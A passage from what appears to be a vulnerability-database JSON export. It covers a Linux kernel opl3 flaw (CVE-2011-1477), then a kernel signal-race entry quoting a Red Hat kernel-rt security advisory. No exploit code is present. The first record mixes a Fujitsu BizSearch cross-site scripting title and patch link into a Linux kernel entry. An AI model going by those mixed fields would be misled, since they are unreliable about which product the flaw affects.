      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2011-1477",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002807",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2011/03/25/1",
        "trust": 1.6
      },
      {
        "db": "BID",
        "id": "48497",
        "trust": 0.9
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-2492",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002832",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201106-382",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "47009",
        "trust": 0.3
      },
      {
        "db": "IVD",
        "id": "1EDCCD3A-1F91-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "SECUNIA",
        "id": "45105",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "102430",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "102644",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "110534",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "101680",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "110495",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "1edccd3a-1f91-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-2492"
      },
      {
        "db": "BID",
        "id": "47009"
      },
      {
        "db": "BID",
        "id": "48497"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002807"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002832"
      },
      {
        "db": "PACKETSTORM",
        "id": "102430"
      },
      {
        "db": "PACKETSTORM",
        "id": "102644"
      },
      {
        "db": "PACKETSTORM",
        "id": "110534"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "db": "PACKETSTORM",
        "id": "110495"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1477"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201106-382"
      }
    ]
  },
  "id": "VAR-201206-0031",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "IVD",
        "id": "1edccd3a-1f91-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-2492"
      }
    ],
    "trust": 1.1666666700000001
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "1edccd3a-1f91-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-2492"
      }
    ]
  },
  "last_update_date": "2023-12-19T22:09:11.160000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.accelatech.com"
      },
      {
        "title": "bizsearch201103",
        "trust": 0.8,
        "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/bizsearch201103.html"
      },
      {
        "title": "ChangeLog-2.6.39",
        "trust": 0.8,
        "url": "http://ftp.osuosl.org/pub/linux/kernel/v2.6/changelog-2.6.39"
      },
      {
        "title": "sound/oss/opl3: validate voice and channel indexes",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/4d00135a680727f6c3be78f8befaac009030e4df"
      },
      {
        "title": "linux/kernel/git/torvalds/linux-2.6.git / commit",
        "trust": 0.8,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=4d00135a680727f6c3be78f8befaac009030e4df"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Fujitsu Accela BizSearch patch for unclear cross-site scripting vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/4290"
      },
      {
        "title": "linux-3.4.4",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=43488"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-2492"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002807"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002832"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201106-382"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-79",
        "trust": 0.8
      },
      {
        "problemtype": "CWE-Other",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002807"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002832"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1477"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "http://ftp.osuosl.org/pub/linux/kernel/v2.6/changelog-2.6.39"
      },
      {
        "trust": 1.6,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=4d00135a680727f6c3be78f8befaac009030e4df"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00020.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2011/03/25/1"
      },
      {
        "trust": 1.6,
        "url": "https://github.com/torvalds/linux/commit/4d00135a680727f6c3be78f8befaac009030e4df"
      },
      {
        "trust": 1.0,
        "url": "http://jvndb.jvn.jp/en/contents/2010/jvndb-2010-002807.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1477"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-1477"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1477"
      },
      {
        "trust": 0.3,
        "url": "http://www.linux.org/"
      },
      {
        "trust": 0.3,
        "url": "http://marc.info/?l=linux-kernel\u0026m=130089499728386\u0026w=2"
      },
      {
        "trust": 0.3,
        "url": "http://permalink.gmane.org/gmane.comp.security.oss.general/4609"
      },
      {
        "trust": 0.3,
        "url": "http://www.fujitsu.com/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1476"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0711"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1172"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0726"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1593"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1163"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1182"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1090"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1173"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1170"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1078"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1493"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1080"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1160"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0695"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3875"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1171"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1079"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1180"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2182"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0710"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1577"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1010"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4655"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1017"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1093"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2524"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1012"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/products/corporate/vim/fs_request_2011/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/45105/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/45105/"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45105"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_intelligence/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/bizsearch201103.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4650"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1927"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1394-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0716"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3619"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0044"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0038"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0006"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4250"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4621"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1759"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-ti-omap4/2.6.35-903.32"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1598"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1585"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1745"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1495"
      },
      {
        "trust": 0.1,
        "url": "http://packages.debian.org/changelogs/pool/main/l/linux-2.6/linux-2.6_2.6.32-34/changelog"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1494"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1478"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1016"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1746"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/2.6.24-31.99"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4324"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0028"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1390-1"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-2492"
      },
      {
        "db": "BID",
        "id": "47009"
      },
      {
        "db": "BID",
        "id": "48497"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002832"
      },
      {
        "db": "PACKETSTORM",
        "id": "102430"
      },
      {
        "db": "PACKETSTORM",
        "id": "102644"
      },
      {
        "db": "PACKETSTORM",
        "id": "110534"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "db": "PACKETSTORM",
        "id": "110495"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1477"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201106-382"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "IVD",
        "id": "1edccd3a-1f91-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-2492"
      },
      {
        "db": "BID",
        "id": "47009"
      },
      {
        "db": "BID",
        "id": "48497"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002807"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002832"
      },
      {
        "db": "PACKETSTORM",
        "id": "102430"
      },
      {
        "db": "PACKETSTORM",
        "id": "102644"
      },
      {
        "db": "PACKETSTORM",
        "id": "110534"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "db": "PACKETSTORM",
        "id": "110495"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1477"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201106-382"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-06-30T00:00:00",
        "db": "IVD",
        "id": "1edccd3a-1f91-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2011-06-30T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-2492"
      },
      {
        "date": "2011-03-23T00:00:00",
        "db": "BID",
        "id": "47009"
      },
      {
        "date": "2011-06-29T00:00:00",
        "db": "BID",
        "id": "48497"
      },
      {
        "date": "2011-06-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-002807"
      },
      {
        "date": "2012-06-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-002832"
      },
      {
        "date": "2011-06-19T20:36:32",
        "db": "PACKETSTORM",
        "id": "102430"
      },
      {
        "date": "2011-06-29T09:00:20",
        "db": "PACKETSTORM",
        "id": "102644"
      },
      {
        "date": "2012-03-07T23:14:40",
        "db": "PACKETSTORM",
        "id": "110534"
      },
      {
        "date": "2011-05-25T14:08:37",
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "date": "2012-03-07T00:01:40",
        "db": "PACKETSTORM",
        "id": "110495"
      },
      {
        "date": "2012-06-21T23:55:02.240000",
        "db": "NVD",
        "id": "CVE-2011-1477"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201106-382"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-06-30T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-2492"
      },
      {
        "date": "2015-03-19T08:31:00",
        "db": "BID",
        "id": "47009"
      },
      {
        "date": "2011-06-29T00:00:00",
        "db": "BID",
        "id": "48497"
      },
      {
        "date": "2011-06-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-002807"
      },
      {
        "date": "2012-06-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-002832"
      },
      {
        "date": "2023-02-13T01:19:10.960000",
        "db": "NVD",
        "id": "CVE-2011-1477"
      },
      {
        "date": "2023-02-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201106-382"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "47009"
      },
      {
        "db": "PACKETSTORM",
        "id": "110495"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201106-382"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Fujitsu Accela BizSearch Unknown Cross-Site Scripting Vulnerability",
    "sources": [
      {
        "db": "IVD",
        "id": "1edccd3a-1f91-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-2492"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201106-382"
      }
    ],
    "trust": 0.6
  }
}

var-202103-0287
Vulnerability from variot

A flaw possibility of race condition and incorrect initialization of the process id was found in the Linux kernel child/parent process identification handling while filtering signal handlers. A local attacker is able to abuse this flaw to bypass checks to send any signal to a privileged process. Linux Kernel Contains an initialization vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel-rt security and bug fix update Advisory ID: RHSA-2021:1739-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:1739 Issue date: 2021-05-18 CVE Names: CVE-2019-19523 CVE-2019-19528 CVE-2020-0431 CVE-2020-11608 CVE-2020-12114 CVE-2020-12362 CVE-2020-12464 CVE-2020-14314 CVE-2020-14356 CVE-2020-15437 CVE-2020-24394 CVE-2020-25212 CVE-2020-25284 CVE-2020-25285 CVE-2020-25643 CVE-2020-25704 CVE-2020-27786 CVE-2020-27835 CVE-2020-28974 CVE-2020-35508 CVE-2021-0342 ==================================================================== 1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time (v. 8) - x86_64 Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

  • kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)

  • kernel: use-after-free caused by a malicious USB device in the drivers/usb/misc/adutux.c driver (CVE-2019-19523)

  • kernel: use-after-free bug caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver (CVE-2019-19528)

  • kernel: possible out of bounds write in kbd_keycode of keyboard.c (CVE-2020-0431)

  • kernel: DoS by corrupting mountpoint reference counter (CVE-2020-12114)

  • kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c (CVE-2020-12464)

  • kernel: buffer uses out of index in ext3/4 filesystem (CVE-2020-14314)

  • kernel: Use After Free vulnerability in cgroup BPF component (CVE-2020-14356)

  • kernel: NULL pointer dereference in serial8250_isa_init_ports function in drivers/tty/serial/8250/8250_core.c (CVE-2020-15437)

  • kernel: umask not applied on filesystem without ACL support (CVE-2020-24394)

  • kernel: TOCTOU mismatch in the NFS client code (CVE-2020-25212)

  • kernel: incomplete permission checking for access to rbd devices (CVE-2020-25284)

  • kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c (CVE-2020-25285)

  • kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow (CVE-2020-25643)

  • kernel: perf_event_parse_addr_filter memory (CVE-2020-25704)

  • kernel: use-after-free in kernel midi subsystem (CVE-2020-27786)

  • kernel: child process is able to access parent mm through hfi dev file handle (CVE-2020-27835)

  • kernel: slab-out-of-bounds read in fbcon (CVE-2020-28974)

  • kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting

  • ->real_parent (CVE-2020-35508)

  • kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege (CVE-2021-0342)

  • kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c (CVE-2020-11608)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.4 Release Notes linked from the References section.

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1783434 - CVE-2019-19523 kernel: use-after-free caused by a malicious USB device in the drivers/usb/misc/adutux.c driver 1783507 - CVE-2019-19528 kernel: use-after-free bug caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver 1831726 - CVE-2020-12464 kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c 1833445 - CVE-2020-11608 kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c 1848652 - CVE-2020-12114 kernel: DoS by corrupting mountpoint reference counter 1853922 - CVE-2020-14314 kernel: buffer uses out of index in ext3/4 filesystem 1868453 - CVE-2020-14356 kernel: Use After Free vulnerability in cgroup BPF component 1869141 - CVE-2020-24394 kernel: umask not applied on filesystem without ACL support 1877575 - CVE-2020-25212 kernel: TOCTOU mismatch in the NFS client code 1879981 - CVE-2020-25643 kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow 1882591 - CVE-2020-25285 kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c 1882594 - CVE-2020-25284 kernel: incomplete permission checking for access to rbd devices 1886109 - BUG: using smp_processor_id() in preemptible [00000000] code: handler106/3082 [rhel-rt-8.4.0] 1894793 - After configure hugepage and reboot test server, kernel got panic status. 1895961 - CVE-2020-25704 kernel: perf_event_parse_addr_filter memory 1896842 - host locks up when running stress-ng itimers on RT kernel. 1897869 - Running oslat in RT guest, guest kernel shows Call Trace: INFO: task kcompactd0:35 blocked for more than 600 seconds. 1900933 - CVE-2020-27786 kernel: use-after-free in kernel midi subsystem 1901161 - CVE-2020-15437 kernel: NULL pointer dereference in serial8250_isa_init_ports function in drivers/tty/serial/8250/8250_core.c 1901709 - CVE-2020-27835 kernel: child process is able to access parent mm through hfi dev file handle 1902724 - CVE-2020-35508 kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting ->real_parent 1903126 - CVE-2020-28974 kernel: slab-out-of-bounds read in fbcon 1915799 - CVE-2021-0342 kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege 1919889 - CVE-2020-0431 kernel: possible out of bounds write in kbd_keycode of keyboard.c 1930246 - CVE-2020-12362 kernel: Integer overflow in Intel(R) Graphics Drivers

  1. Package List:

Red Hat Enterprise Linux Real Time for NFV (v. 8):

Source: kernel-rt-4.18.0-305.rt7.72.el8.src.rpm

x86_64: kernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm

Red Hat Enterprise Linux Real Time (v. 8):

Source: kernel-rt-4.18.0-305.rt7.72.el8.src.rpm

x86_64: kernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

